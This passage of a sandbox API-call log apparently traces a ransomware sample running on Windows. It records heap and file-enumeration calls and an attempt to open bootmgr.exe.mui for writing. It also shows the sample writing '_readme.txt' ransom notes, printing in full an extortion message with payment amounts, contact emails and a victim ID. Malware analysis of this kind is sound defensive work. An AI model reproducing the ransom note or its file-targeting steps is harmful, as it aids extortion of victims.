Flags=0x0, Size=0x20) returned 0x32f9278 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.650] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.650] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.650] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.650] PathFindFileNameW (pszPath="") returned="" [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.650] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.651] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.651] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.651] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.651] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.651] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.651] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.651] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.651] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.652] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.652] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.652] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.652] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0201.652] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.652] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.652] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.652] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.652] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 